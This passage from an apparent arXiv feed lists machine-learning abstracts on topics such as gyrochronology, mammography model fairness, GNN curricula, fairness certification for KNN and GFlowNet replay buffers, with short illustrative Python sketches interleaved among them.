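For orientation, in the full-information analogue FTRL with a negative-entropy regularizer has a closed form: the distribution minimizing $\langle p, L\rangle + \frac{1}{\eta}\sum_i p_i \ln p_i$ over the simplex is exponential weights. The sketch shows only this update; the bandit setting additionally requires unbiased loss estimators built from partial feedback, which we omit.

```python
import math

def ftrl_neg_entropy(cum_losses, eta=0.1):
    """FTRL with negative entropy over the probability simplex:
    p_i is proportional to exp(-eta * L_i) for cumulative losses L_i
    (the exponential-weights closed form)."""
    w = [math.exp(-eta * L) for L in cum_losses]
    z = sum(w)
    return [x / z for x in w]
```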
    A Novel Application of Conditional Normalizing Flows: Stellar Age Inference with Gyrochronology. (arXiv:2307.08753v1 [astro-ph.SR])
    Stellar ages are critical building blocks of evolutionary models, but challenging to measure for low mass main sequence stars. An unexplored solution in this regime is the application of probabilistic machine learning methods to gyrochronology, a stellar dating technique that is uniquely well suited for these stars. While accurate analytical gyrochronological models have proven challenging to develop, here we apply conditional normalizing flows to photometric data from open star clusters, and demonstrate that a data-driven approach can constrain gyrochronological ages with a precision comparable to other standard techniques. We evaluate the flow results in the context of a Bayesian framework, and show that our inferred ages recover literature values well. This work demonstrates the potential of a probabilistic data-driven solution to widen the applicability of gyrochronological stellar dating.
    K-Tensors: Clustering Positive Semi-Definite Matrices. (arXiv:2306.06534v3 [cs.LG] UPDATED)
    This paper introduces a novel self-consistency clustering algorithm ($K$-Tensors) designed for partitioning a distribution of positive semi-definite matrices based on their eigenstructures. As positive semi-definite matrices can be represented as ellipsoids in $\mathbb R^p$, $p \ge 2$, it is critical to maintain their structural information to perform effective clustering. However, traditional clustering algorithms applied to matrices often involve vectorization of the matrices, resulting in a loss of essential structural information. To address this issue, we propose a distance metric for clustering that is specifically based on the structural information of positive semi-definite matrices. This distance metric enables the clustering algorithm to consider the differences between positive semi-definite matrices and their projections onto a common space spanned by orthonormal vectors defined from a set of positive semi-definite matrices. This innovative approach to clustering positive semi-definite matrices has broad applications in several domains including financial and biomedical research, such as analyzing functional connectivity data. By maintaining the structural information of positive semi-definite matrices, our proposed algorithm promises to cluster the positive semi-definite matrices in a more meaningful way, thereby facilitating deeper insights into the underlying data in various applications.
    Graph Representation of the Magnetic Field Topology in High-Fidelity Plasma Simulations for Machine Learning Applications. (arXiv:2307.09469v1 [physics.plasm-ph])
    Topological analysis of the magnetic field in simulated plasmas allows the study of various physical phenomena in a wide range of settings. One such application is magnetic reconnection, a phenomenon related to the dynamics of the magnetic field topology, which is difficult to detect and characterize in three dimensions. We propose a scalable pipeline for topological data analysis and spatiotemporal graph representation of three-dimensional magnetic vector fields. We demonstrate our methods on simulations of the Earth's magnetosphere produced by Vlasiator, a supercomputer-scale Vlasov theory-based simulation for near-Earth space. The purpose of this work is to challenge the machine learning community to explore graph-based machine learning approaches to address a largely open scientific problem with wide-ranging potential impact.
    Performance Gaps of Artificial Intelligence Models Screening Mammography -- Towards Fair and Interpretable Models. (arXiv:2305.04422v2 [eess.IV] UPDATED)
    Even though deep learning models for abnormality classification can perform well in screening mammography, the demographic and imaging characteristics associated with increased risk of failure for abnormality classification in screening mammograms remain unclear. This retrospective study used data from the Emory BrEast Imaging Dataset (EMBED), including mammograms from 115,931 patients imaged at Emory University Healthcare between 2013 and 2020. Clinical and imaging data include Breast Imaging Reporting and Data System (BI-RADS) assessment, region of interest coordinates for abnormalities, imaging features, pathologic outcomes, and patient demographics. Deep learning models including InceptionV3, VGG16, ResNet50V2, and ResNet152V2 were developed to distinguish between patches of abnormal tissue and randomly selected patches of normal tissue from the screening mammograms. The training, validation, and test sets comprise 29,144 (55.6%) patches from 10,678 (54.2%) patients, 9,910 (18.9%) patches from 3,609 (18.3%) patients, and 13,390 (25.5%) patches from 5,404 (27.5%) patients, respectively. We assessed model performance overall and within subgroups defined by age, race, pathologic outcome, and imaging characteristics to evaluate reasons for misclassifications. On the test set, a ResNet152V2 model trained to classify normal versus abnormal tissue patches achieved an accuracy of 92.6% (95%CI=92.0-93.2%) and an area under the receiver operating characteristic curve of 0.975 (95%CI=0.972-0.978). Imaging characteristics associated with higher misclassification rates include higher tissue densities (risk ratio [RR]=1.649; p=.010, BI-RADS density C and RR=2.026; p=.003, BI-RADS density D) and the presence of architectural distortion (RR=1.026; p<.001). Small but statistically significant differences in performance were observed by age, race, pathologic outcome, and other imaging features (p<.001).
    Evaluate Fine-tuning Strategies for Fetal Head Ultrasound Image Segmentation with U-Net. (arXiv:2307.09067v1 [eess.IV])
    Fetal head segmentation is a crucial step in measuring the fetal head circumference (HC) during gestation, an important biometric in obstetrics for monitoring fetal growth. However, manual biometry generation is time-consuming and results in inconsistent accuracy. To address this issue, convolutional neural network (CNN) models have been utilized to improve the efficiency of medical biometry. However, training a CNN from scratch is challenging, so we propose a Transfer Learning (TL) method. Our approach involves fine-tuning (FT) a U-Net network with a lightweight MobileNet encoder to segment a set of fetal head ultrasound (US) images with limited effort. Results suggest that our proposed FT strategy yields comparable segmentation performance while reducing the number of trainable parameters by 85.8%, and that it outperforms other strategies with trainable parameter sizes below 4.4 million. We therefore contend that it can serve as a dependable FT approach for reducing model size in medical image analysis. Our key findings highlight the importance of balancing model performance and size when developing Artificial Intelligence (AI) applications with TL methods. Code is available at https://github.com/13204942/FT_Methods_for_Fetal_Head_Segmentation.
    Curriculum Learning for Graph Neural Networks: A Multiview Competence-based Approach. (arXiv:2307.08859v1 [cs.LG])
    A curriculum is a planned sequence of learning materials and an effective one can make learning efficient and effective for both humans and machines. Recent studies developed effective data-driven curriculum learning approaches for training graph neural networks in language applications. However, existing curriculum learning approaches often employ a single criterion of difficulty in their training paradigms. In this paper, we propose a new perspective on curriculum learning by introducing a novel approach that builds on graph complexity formalisms (as difficulty criteria) and model competence during training. The model consists of a scheduling scheme which derives effective curricula by accounting for different views of sample difficulty and model competence during training. The proposed solution advances existing research in curriculum learning for graph neural networks with the ability to incorporate a fine-grained spectrum of graph difficulty criteria in their training paradigms. Experimental results on real-world link prediction and node classification tasks illustrate the effectiveness of the proposed approach.
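A competence-based schedule of the general kind described can be sketched as follows. The root-p competence curve and the single scalar difficulty are simplifying assumptions on our part; the paper's scheduler combines multiple graph-complexity views of sample difficulty.

```python
def competence(t, T, c0=0.1, p=2):
    """Competence schedule: the fraction of the difficulty range the model
    is allowed to see at training step t out of T, rising from c0 to 1
    (a common root-p form used in competence-based curricula)."""
    return min(1.0, (c0 ** p + (1 - c0 ** p) * t / T) ** (1 / p))

def curriculum_batch(samples, difficulties, t, T):
    """Admit only samples whose difficulty (normalized to [0, 1]) does not
    exceed the current competence."""
    c = competence(t, T)
    return [s for s, d in zip(samples, difficulties) if d <= c]
```

Early in training only the easiest samples are admitted; by step T the full dataset is in play.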
    Characterization of partial wetting by CMAS droplets using multiphase many-body dissipative particle dynamics and data-driven discovery based on PINNs. (arXiv:2307.09142v1 [physics.flu-dyn])
    The molten sand, a mixture of calcia, magnesia, alumina, and silicate, known as CMAS, is characterized by its high viscosity, density, and surface tension. The unique properties of CMAS make it a challenging material to deal with in high-temperature applications, requiring innovative solutions and materials to prevent its buildup and damage to critical equipment. Here, we use multiphase many-body dissipative particle dynamics (mDPD) simulations to study the wetting dynamics of highly viscous molten CMAS droplets. The simulations are performed in three dimensions, with varying initial droplet sizes and equilibrium contact angles. We propose a coarse parametric ordinary differential equation (ODE) that captures the spreading radius behavior of the CMAS droplets. The ODE parameters are then identified based on the Physics-Informed Neural Network (PINN) framework. Subsequently, the closed form dependency of parameter values found by PINN on the initial radii and contact angles are given using symbolic regression. Finally, we employ Bayesian PINNs (B-PINNs) to assess and quantify the uncertainty associated with the discovered parameters. In brief, this study provides insight into spreading dynamics of CMAS droplets by fusing simple parametric ODE modeling and state-of-the-art machine learning techniques.
    Quality Assessment of Photoplethysmography Signals For Cardiovascular Biomarkers Monitoring Using Wearable Devices. (arXiv:2307.08766v1 [cs.LG])
Photoplethysmography (PPG) is a non-invasive technology that measures changes in blood volume in the microvascular bed of tissue. It is commonly used in medical devices such as pulse oximeters and wrist-worn heart rate monitors to monitor cardiovascular hemodynamics. PPG allows for the assessment of parameters (e.g., heart rate, pulse waveform, and peripheral perfusion) that can indicate conditions such as vasoconstriction or vasodilation, and provides information about microvascular blood flow, making it a valuable tool for monitoring cardiovascular health. However, PPG is subject to a number of sources of variation that can impact its accuracy and reliability, especially when using a wearable device for continuous monitoring, such as motion artifacts, skin pigmentation, and vasomotion. In this study, we extracted 27 statistical features from the PPG signal for training machine-learning models based on gradient boosting (XGBoost and CatBoost) and Random Forest (RF) algorithms to assess the quality of PPG signals that were labeled as good or poor quality. We used the PPG time series from a publicly available dataset and evaluated the algorithms' performance using Sensitivity (Se), Positive Predicted Value (PPV), and F1-score (F1) metrics. Our model achieved Se, PPV, and F1-score of 94.4, 95.6, and 95.0 for XGBoost, 94.7, 95.9, and 95.3 for CatBoost, and 93.7, 91.3 and 92.5 for RF, respectively. Our findings are comparable to the state of the art reported in the literature, but were obtained with a much simpler model, indicating that ML models are promising for developing remote, non-invasive, and continuous measurement devices.
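As a minimal illustration of the feature-extraction step, the sketch below computes a handful of statistical moments from a synthetic pulse-like segment using only the standard library. The paper's exact 27 features and the XGBoost/CatBoost/RF classifiers are not reproduced; all names here are illustrative.

```python
import math
import statistics

def ppg_features(signal):
    """A few features of the kind described: moments of the raw signal segment.
    (The paper extracts 27 features; the exact list is not reproduced here.)"""
    n = len(signal)
    mu = statistics.fmean(signal)
    sd = statistics.pstdev(signal)
    skew = sum((x - mu) ** 3 for x in signal) / (n * sd ** 3)
    kurt = sum((x - mu) ** 4 for x in signal) / (n * sd ** 4) - 3.0
    return {"mean": mu, "std": sd, "skewness": skew, "excess_kurtosis": kurt}

# A short synthetic pulse-like segment: a sine with a small deterministic perturbation.
segment = [math.sin(2 * math.pi * t / 50) + 0.05 * ((t * 37) % 11 - 5) / 5
           for t in range(200)]
feats = ppg_features(segment)
```

A feature dictionary like this (one row per signal window) is what would be fed to a gradient-boosting or random-forest classifier for the good/poor quality labels.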
    An Admissible Shift-Consistent Method for Recommender Systems. (arXiv:2307.08857v1 [cs.IR])
    In this paper, we propose a new constraint, called shift-consistency, for solving matrix/tensor completion problems in the context of recommender systems. Our method provably guarantees several key mathematical properties: (1) satisfies a recently established admissibility criterion for recommender systems; (2) satisfies a definition of fairness that eliminates a specific class of potential opportunities for users to maliciously influence system recommendations; and (3) offers robustness by exploiting provable uniqueness of missing-value imputation. We provide a rigorous mathematical description of the method, including its generalization from matrix to tensor form to permit representation and exploitation of complex structural relationships among sets of user and product attributes. We argue that our analysis suggests a structured means for defining latent-space projections that can permit provable performance properties to be established for machine learning methods.
    Overthinking the Truth: Understanding how Language Models Process False Demonstrations. (arXiv:2307.09476v1 [cs.LG])
    Modern language models can imitate complex patterns through few-shot learning, enabling them to complete challenging tasks without fine-tuning. However, imitation can also lead models to reproduce inaccuracies or harmful content if present in the context. We study harmful imitation through the lens of a model's internal representations, and identify two related phenomena: overthinking and false induction heads. The first phenomenon, overthinking, appears when we decode predictions from intermediate layers, given correct vs. incorrect few-shot demonstrations. At early layers, both demonstrations induce similar model behavior, but the behavior diverges sharply at some "critical layer", after which the accuracy given incorrect demonstrations progressively decreases. The second phenomenon, false induction heads, are a possible mechanistic cause of overthinking: these are heads in late layers that attend to and copy false information from previous demonstrations, and whose ablation reduces overthinking. Beyond scientific understanding, our results suggest that studying intermediate model computations could be a promising avenue for understanding and guarding against harmful model behaviors.
    Certifying the Fairness of KNN in the Presence of Dataset Bias. (arXiv:2307.08722v1 [cs.LG])
We propose a method for certifying the fairness of the classification result of a widely used supervised learning algorithm, the k-nearest neighbors (KNN), under the assumption that the training data may have historical bias caused by systematic mislabeling of samples from a protected minority group. To the best of our knowledge, this is the first certification method for KNN based on three variants of the fairness definition: individual fairness, $\epsilon$-fairness, and label-flipping fairness. We first define the fairness certification problem for KNN and then propose sound approximations of the complex arithmetic computations used in the state-of-the-art KNN algorithm. This is meant to lift the computation results from the concrete domain to an abstract domain, to reduce the computational cost. We show the effectiveness of this abstract-interpretation-based technique through experimental evaluation on six datasets widely used in the fairness research literature. We also show that the method is accurate enough to obtain fairness certifications for a large number of test inputs, despite the presence of historical bias in the datasets.
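A drastically simplified rendering of label-flipping robustness (not the paper's abstract-interpretation procedure): for a binary KNN vote, flipping one neighbor's training label shifts the vote margin by two, so a prediction is stable under a flip budget whenever the margin exceeds twice that budget. Names here are illustrative.

```python
from collections import Counter

def certified_under_label_flips(neighbor_labels, flip_budget):
    """Certify a binary KNN vote against up to `flip_budget` flipped training
    labels among the k nearest neighbors. Flipping one neighbor's label moves
    one vote across classes, changing the margin by 2, so the prediction is
    stable iff margin > 2 * flip_budget. (An illustrative simplification of
    label-flipping fairness, not the paper's certification procedure.)"""
    votes = Counter(neighbor_labels)
    (_, c1), *rest = votes.most_common()
    c2 = rest[0][1] if rest else 0
    return (c1 - c2) > 2 * flip_budget

# A 5-NN vote of 4 vs 1 has margin 3: it survives one flip but not two.
assert certified_under_label_flips([1, 1, 1, 1, 0], flip_budget=1)
assert not certified_under_label_flips([1, 1, 1, 1, 0], flip_budget=2)
```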
    Landscape Surrogate: Learning Decision Losses for Mathematical Optimization Under Partial Information. (arXiv:2307.08964v1 [cs.LG])
    Recent works in learning-integrated optimization have shown promise in settings where the optimization problem is only partially observed or where general-purpose optimizers perform poorly without expert tuning. By learning an optimizer $\mathbf{g}$ to tackle these challenging problems with $f$ as the objective, the optimization process can be substantially accelerated by leveraging past experience. The optimizer can be trained with supervision from known optimal solutions or implicitly by optimizing the compound function $f\circ \mathbf{g}$. The implicit approach may not require optimal solutions as labels and is capable of handling problem uncertainty; however, it is slow to train and deploy due to frequent calls to optimizer $\mathbf{g}$ during both training and testing. The training is further challenged by sparse gradients of $\mathbf{g}$, especially for combinatorial solvers. To address these challenges, we propose using a smooth and learnable Landscape Surrogate $M$ as a replacement for $f\circ \mathbf{g}$. This surrogate, learnable by neural networks, can be computed faster than the solver $\mathbf{g}$, provides dense and smooth gradients during training, can generalize to unseen optimization problems, and is efficiently learned via alternating optimization. We test our approach on both synthetic problems, including shortest path and multidimensional knapsack, and real-world problems such as portfolio optimization, achieving comparable or superior objective values compared to state-of-the-art baselines while reducing the number of calls to $\mathbf{g}$. Notably, our approach outperforms existing methods for computationally expensive high-dimensional problems.
    Non-stationary Delayed Combinatorial Semi-Bandit with Causally Related Rewards. (arXiv:2307.09093v1 [cs.LG])
Sequential decision-making under uncertainty is often associated with long feedback delays. Such delays degrade the performance of the learning agent in identifying a subset of arms with the optimal collective reward in the long run. This problem becomes significantly challenging in a non-stationary environment with structural dependencies amongst the reward distributions associated with the arms. Therefore, besides adapting to delays and environmental changes, learning the causal relations alleviates the adverse effects of feedback delay on the decision-making process. We formalize the described setting as a non-stationary and delayed combinatorial semi-bandit problem with causally related rewards. We model the causal relations by a directed graph in a stationary structural equation model. The agent maximizes the long-term average payoff, defined as a linear function of the base arms' rewards. We develop a policy that learns the structural dependencies from delayed feedback and utilizes it to optimize decision-making while adapting to drifts. We prove a regret bound for the performance of the proposed algorithm. In addition, we evaluate our method via numerical analysis using synthetic and real-world datasets to detect the regions that contribute the most to the spread of Covid-19 in Italy.
    Self-Repellent Random Walks on General Graphs -- Achieving Minimal Sampling Variance via Nonlinear Markov Chains. (arXiv:2305.05097v2 [math.PR] UPDATED)
We consider random walks on discrete state spaces, such as general undirected graphs, where the random walkers are designed to approximate a target quantity over the network topology via sampling and neighborhood exploration in the form of Markov chain Monte Carlo (MCMC) procedures. Given any Markov chain corresponding to a target probability distribution, we design a self-repellent random walk (SRRW) which is less likely to transition to nodes that were highly visited in the past, and more likely to transition to seldom visited nodes. For a class of SRRWs parameterized by a positive real {\alpha}, we prove that the empirical distribution of the process converges almost surely to the target (stationary) distribution of the underlying Markov chain kernel. We then provide a central limit theorem and derive the exact form of the arising asymptotic covariance matrix, which allows us to show that the SRRW with a stronger repellence (larger {\alpha}) always achieves a smaller asymptotic covariance, in the sense of Loewner ordering of covariance matrices. Especially for SRRW-driven MCMC algorithms, we show that the decrease in the asymptotic sampling variance is of the order O(1/{\alpha}), eventually going down to zero. Finally, we provide numerical simulations complementary to our theoretical results, also empirically testing a version of SRRW with {\alpha} increasing in time to combine the benefits of smaller asymptotic variance due to large {\alpha}, with empirically observed faster mixing properties of SRRW with smaller {\alpha}.
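The visit-count reweighting at the heart of an SRRW can be sketched as follows. This toy version uses a uniform base chain (and implicitly a uniform target) on a small graph; the exact SRRW kernel in the paper differs, and all names are illustrative.

```python
import random

def srrw_walk(adj, alpha, steps, seed=0):
    """Toy self-repellent random walk on an undirected graph: the base chain
    picks a neighbor uniformly, but transition weights are scaled by
    (1 + visit count)^(-alpha), so heavily visited nodes are avoided.
    Larger alpha means stronger repellence."""
    rng = random.Random(seed)
    visits = {v: 0 for v in adj}
    node = next(iter(adj))
    for _ in range(steps):
        visits[node] += 1
        nbrs = adj[node]
        weights = [(1 + visits[v]) ** (-alpha) for v in nbrs]
        node = rng.choices(nbrs, weights=weights)[0]
    return visits

# On a 4-cycle, repellence keeps the empirical distribution close to uniform.
cycle = {0: [1, 3], 1: [0, 2], 2: [1, 3], 3: [2, 0]}
counts = srrw_walk(cycle, alpha=2.0, steps=4000)
```

The repellence term is what suppresses the sampling variance relative to the base chain: nodes that run ahead of their target share are visited less often until the others catch up.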
    An Empirical Study of the Effectiveness of Using a Replay Buffer on Mode Discovery in GFlowNets. (arXiv:2307.07674v2 [cs.LG] UPDATED)
Reinforcement Learning (RL) algorithms aim to learn an optimal policy by iteratively sampling actions to learn how to maximize the total expected return, $R(x)$. GFlowNets are a special class of algorithms designed to generate diverse candidates, $x$, from a discrete set, by learning a policy that samples candidates in proportion to $R(x)$. GFlowNets exhibit improved mode discovery compared to conventional RL algorithms, which is very useful for applications such as drug discovery and combinatorial search. However, since GFlowNets are a relatively recent class of algorithms, many techniques which are useful in RL have not yet been associated with them. In this paper, we study the utilization of a replay buffer for GFlowNets. We empirically explore various replay buffer sampling techniques and assess the impact on the speed of mode discovery and the quality of the modes discovered. Our experimental results in the Hypergrid toy domain and a molecule synthesis environment demonstrate significant improvements in mode discovery when training with a replay buffer, compared to training only with trajectories generated on-policy.
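A minimal FIFO replay buffer of the kind studied can be sketched as below, with uniform sampling (the paper compares several sampling strategies; all names here are illustrative).

```python
import random

class ReplayBuffer:
    """Minimal FIFO replay buffer for off-policy training: store
    (trajectory, reward) pairs and mix replayed samples into each batch."""
    def __init__(self, capacity):
        self.capacity, self.data = capacity, []

    def add(self, trajectory, reward):
        self.data.append((trajectory, reward))
        if len(self.data) > self.capacity:
            self.data.pop(0)  # evict the oldest entry

    def sample(self, batch_size, rng=random):
        # Uniform sampling without replacement from the stored pairs.
        return rng.sample(self.data, min(batch_size, len(self.data)))

buf = ReplayBuffer(capacity=100)
for i in range(150):
    buf.add(trajectory=[i], reward=float(i))
batch = buf.sample(16)
```

In a GFlowNet training loop, a batch would mix freshly generated on-policy trajectories with trajectories drawn from a buffer like this.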
    Knowledge-infused Deep Learning Enables Interpretable Landslide Forecasting. (arXiv:2307.08951v1 [cs.LG])
    Forecasting how landslides will evolve over time or whether they will fail is a challenging task due to a variety of factors, both internal and external. Despite their considerable potential to address these challenges, deep learning techniques lack interpretability, undermining the credibility of the forecasts they produce. The recent development of transformer-based deep learning offers untapped possibilities for forecasting landslides with unprecedented interpretability and nonlinear feature learning capabilities. Here, we present a deep learning pipeline that is capable of predicting landslide behavior holistically, which employs a transformer-based network called LFIT to learn complex nonlinear relationships from prior knowledge and multiple source data, identifying the most relevant variables, and demonstrating a comprehensive understanding of landslide evolution and temporal patterns. By integrating prior knowledge, we provide improvement in holistic landslide forecasting, enabling us to capture diverse responses to various influencing factors in different local landslide areas. Using deformation observations as proxies for measuring the kinetics of landslides, we validate our approach by training models to forecast reservoir landslides in the Three Gorges Reservoir and creeping landslides on the Tibetan Plateau. When prior knowledge is incorporated, we show that interpretable landslide forecasting effectively identifies influential factors across various landslides. It further elucidates how local areas respond to these factors, making landslide behavior and trends more interpretable and predictable. The findings from this study will contribute to understanding landslide behavior in a new way and make the proposed approach applicable to other complex disasters influenced by internal and external factors in the future.
    Learning Adaptive Neighborhoods for Graph Neural Networks. (arXiv:2307.09065v1 [cs.CV])
    Graph convolutional networks (GCNs) enable end-to-end learning on graph structured data. However, many works assume a given graph structure. When the input graph is noisy or unavailable, one approach is to construct or learn a latent graph structure. These methods typically fix the choice of node degree for the entire graph, which is suboptimal. Instead, we propose a novel end-to-end differentiable graph generator which builds graph topologies where each node selects both its neighborhood and its size. Our module can be readily integrated into existing pipelines involving graph convolution operations, replacing the predetermined or existing adjacency matrix with one that is learned, and optimized, as part of the general objective. As such it is applicable to any GCN. We integrate our module into trajectory prediction, point cloud classification and node classification pipelines resulting in improved accuracy over other structure-learning methods across a wide range of datasets and GCN backbones.
    Stochastic Optimal Control for Collective Variable Free Sampling of Molecular Transition Paths. (arXiv:2207.02149v2 [q-bio.BM] UPDATED)
We consider the problem of sampling transition paths between two given metastable states of a molecular system, e.g. a folded and unfolded protein or products and reactants of a chemical reaction. Due to the existence of high energy barriers separating the states, these transition paths are unlikely to be sampled with standard Molecular Dynamics (MD) simulation. Traditional methods to augment MD with a bias potential to increase the probability of the transition rely on a dimensionality reduction step based on Collective Variables (CVs). Unfortunately, selecting appropriate CVs requires chemical intuition, and traditional methods are therefore not always applicable to larger systems. Additionally, when incorrect CVs are used, the bias potential might not be minimal and might bias the system along dimensions irrelevant to the transition. Showing a formal relation between the problem of sampling molecular transition paths, the Schr\"odinger bridge problem, and stochastic optimal control with neural network policies, we propose a machine learning method for sampling said transitions. Unlike previous non-machine learning approaches, our method, named PIPS, does not depend on CVs. We show that our method successfully generates low-energy transitions for Alanine Dipeptide as well as the larger Polyproline and Chignolin proteins.
    High Fidelity Image Counterfactuals with Probabilistic Causal Models. (arXiv:2306.15764v2 [cs.LG] UPDATED)
    We present a general causal generative modelling framework for accurate estimation of high fidelity image counterfactuals with deep structural causal models. Estimation of interventional and counterfactual queries for high-dimensional structured variables, such as images, remains a challenging task. We leverage ideas from causal mediation analysis and advances in generative modelling to design new deep causal mechanisms for structured variables in causal models. Our experiments demonstrate that our proposed mechanisms are capable of accurate abduction and estimation of direct, indirect and total effects as measured by axiomatic soundness of counterfactuals.
    Efficient Large-Scale Visual Representation Learning And Evaluation. (arXiv:2305.13399v4 [cs.CV] UPDATED)
    In this article, we present our approach to single-modality visual representation learning. Understanding visual representations of items is vital for fashion recommendations in e-commerce. We detail and contrast techniques used to finetune large-scale visual representation learning models in an efficient manner under low-resource settings, including several pretrained backbone architectures, both in the convolutional neural network as well as the vision transformer family. We describe the challenges for e-commerce applications at-scale and highlight the efforts to more efficiently train, evaluate, and serve visual representations. We present ablation studies evaluating the representation offline performance for several downstream tasks, including visually similar ad recommendations on mobile devices. To this end, we present a novel multilingual text-to-image generative offline evaluation method for visually similar recommendation systems. Finally, we include online results from deployed machine learning systems in production at Etsy.
    Causal-Based Supervision of Attention in Graph Neural Network: A Better and Simpler Choice towards Powerful Attention. (arXiv:2305.13115v2 [cs.LG] UPDATED)
Recent years have witnessed the great potential of attention mechanisms in graph representation learning. However, while variants of attention-based GNNs are setting new benchmarks for numerous real-world datasets, recent works have pointed out that their induced attentions are less robust and generalizable against noisy graphs due to a lack of direct supervision. In this paper, we present a new framework which utilizes the tool of causality to provide a powerful supervision signal for the learning process of attention functions. Specifically, we estimate the direct causal effect of attention on the final prediction, and then maximize such effect to guide attention toward more meaningful neighbors. Our method can serve as a plug-and-play module for any canonical attention-based GNN in an end-to-end fashion. Extensive experiments on a wide range of benchmark datasets illustrate that, by directly supervising attention functions, the model is able to converge faster with a clearer decision boundary, and thus yields better performance.
    Machine Learning Enhanced Hankel Dynamic-Mode Decomposition. (arXiv:2303.06289v3 [cs.LG] UPDATED)
    While the acquisition of time series has become more straightforward, developing dynamical models from time series is still a challenging and evolving problem domain. Within the last several years, to address this problem, there has been a merging of machine learning tools with what is called the dynamic mode decomposition (DMD). This general approach has been shown to be an especially promising avenue for accurate model development. Building on this prior body of work, we develop a deep learning DMD based method which makes use of the fundamental insight of Takens' Embedding Theorem to build an adaptive learning scheme that better approximates higher dimensional and chaotic dynamics. We call this method the Deep Learning Hankel DMD (DLHDMD). We likewise explore how our method learns mappings which tend, after successful training, to significantly change the mutual information between dimensions in the dynamics. This appears to be a key feature in enhancing the DMD overall, and it should help provide further insight for developing other deep learning methods for time series analysis and model generation.
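The Hankel (delay-embedding) construction underlying Hankel DMD can be sketched in a few lines: it stacks time-shifted copies of a scalar series into the Takens-style delay matrix on which DMD then operates. Names here are illustrative.

```python
def hankel_matrix(series, delay_dim):
    """Stack `delay_dim` time-shifted windows of a scalar series into a
    Hankel (delay-embedding) matrix: row i is series[i : i + delay_dim].
    Anti-diagonals of the result are constant."""
    rows = len(series) - delay_dim + 1
    return [[series[i + j] for j in range(delay_dim)] for i in range(rows)]

H = hankel_matrix([0, 1, 2, 3, 4, 5], delay_dim=3)
# H == [[0, 1, 2], [1, 2, 3], [2, 3, 4], [3, 4, 5]]
```

Per Takens' theorem, a sufficiently large `delay_dim` lets such a matrix capture dynamics that are not observable from the scalar series alone, which is the insight the DLHDMD method builds on.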
    High-Probability Bounds for Stochastic Optimization and Variational Inequalities: the Case of Unbounded Variance. (arXiv:2302.00999v2 [math.OC] UPDATED)
    During recent years the interest of optimization and machine learning communities in high-probability convergence of stochastic optimization methods has been growing. One of the main reasons for this is that high-probability complexity bounds are more accurate and less studied than in-expectation ones. However, SOTA high-probability non-asymptotic convergence results are derived under strong assumptions such as the boundedness of the gradient noise variance or of the objective's gradient itself. In this paper, we propose several algorithms with high-probability convergence results under less restrictive assumptions. In particular, we derive new high-probability convergence results under the assumption that the gradient/operator noise has bounded central $\alpha$-th moment for $\alpha \in (1,2]$ in the following setups: (i) smooth non-convex / Polyak-Lojasiewicz / convex / strongly convex / quasi-strongly convex minimization problems, (ii) Lipschitz / star-cocoercive and monotone / quasi-strongly monotone variational inequalities. These results justify the usage of the considered methods for solving problems that do not fit standard functional classes studied in stochastic optimization.
    Conditionally Calibrated Predictive Distributions by Probability-Probability Map: Application to Galaxy Redshift Estimation and Probabilistic Forecasting. (arXiv:2205.14568v4 [stat.ML] UPDATED)
    Uncertainty quantification is crucial for assessing the predictive ability of AI algorithms. Much research has been devoted to describing the predictive distribution (PD) $F(y|\mathbf{x})$ of a target variable $y \in \mathbb{R}$ given complex input features $\mathbf{x} \in \mathcal{X}$. However, off-the-shelf PDs (from, e.g., normalizing flows and Bayesian neural networks) often lack conditional calibration with the probability of occurrence of an event given input $\mathbf{x}$ being significantly different from the predicted probability. Current calibration methods do not fully assess and enforce conditionally calibrated PDs. Here we propose \texttt{Cal-PIT}, a method that addresses both PD diagnostics and recalibration by learning a single probability-probability map from calibration data. The key idea is to regress probability integral transform scores against $\mathbf{x}$. The estimated regression provides interpretable diagnostics of conditional coverage across the feature space. The same regression function morphs the misspecified PD to a re-calibrated PD for all $\mathbf{x}$. We benchmark our corrected prediction bands (a by-product of corrected PDs) against oracle bands and state-of-the-art predictive inference algorithms for synthetic data. We also provide results for two applications: (i) probabilistic nowcasting given sequences of satellite images, and (ii) conditional density estimation of galaxy distances given imaging data (so-called photometric redshift estimation). Our code is available as a Python package https://github.com/lee-group-cmu/Cal-PIT .
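The probability integral transform (PIT) scores that Cal-PIT regresses against the features can be sketched for Gaussian predictive distributions; under perfect conditional calibration these scores are uniform on [0, 1]. The Gaussian choice and all names are illustrative.

```python
import math

def normal_cdf(x, mu, sigma):
    """CDF of a Gaussian N(mu, sigma^2), via the error function."""
    return 0.5 * (1.0 + math.erf((x - mu) / (sigma * math.sqrt(2.0))))

def pit_scores(ys, predicted_params):
    """Probability integral transform: evaluate each predictive CDF at the
    observed target. If the predictive distributions are conditionally
    calibrated, these scores are Uniform(0, 1); regressing them against the
    features x is the diagnostic/recalibration idea behind Cal-PIT."""
    return [normal_cdf(y, mu, sigma) for y, (mu, sigma) in zip(ys, predicted_params)]

# Toy check: observations at the mean and at +/- one sigma of a standard normal.
scores = pit_scores([0.0, 1.0, -1.0], [(0.0, 1.0), (0.0, 1.0), (0.0, 1.0)])
```

Systematic deviation of such scores from uniformity, as a function of x, is exactly the conditional miscalibration the probability-probability map is fitted to correct.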
    Martian time-series unraveled: A multi-scale nested approach with factorial variational autoencoders. (arXiv:2305.16189v2 [cs.LG] UPDATED)
    Unsupervised source separation involves unraveling an unknown set of source signals recorded through a mixing operator, with limited prior knowledge about the sources, and only access to a dataset of signal mixtures. This problem is inherently ill-posed and is further challenged by the variety of time-scales exhibited by sources in time series data. Existing methods typically rely on a preselected window size that limits their capacity to handle multi-scale sources. To address this issue, instead of operating in the time domain, we propose an unsupervised multi-scale clustering and source separation framework by leveraging wavelet scattering covariances that provide a low-dimensional representation of stochastic processes, capable of distinguishing between different non-Gaussian stochastic processes. Nested within this representation space, we develop a factorial Gaussian-mixture variational autoencoder that is trained to (1) probabilistically cluster sources at different time-scales and (2) independently sample scattering covariance representations associated with each cluster. Using samples from each cluster as prior information, we formulate source separation as an optimization problem in the wavelet scattering covariance representation space, resulting in separated sources in the time domain. When applied to seismic data recorded during the NASA InSight mission on Mars, our multi-scale nested approach proves to be a powerful tool for discriminating between sources varying greatly in time-scale, e.g., minute-long transient one-sided pulses (known as ``glitches'') and structured ambient noises resulting from atmospheric activities that typically last for tens of minutes. These results provide an opportunity to conduct further investigations into the isolated sources related to atmospheric-surface interactions, thermal relaxations, and other complex phenomena.
    A survey on learning from imbalanced data streams: taxonomy, challenges, empirical study, and reproducible experimental framework. (arXiv:2204.03719v2 [cs.LG] UPDATED)
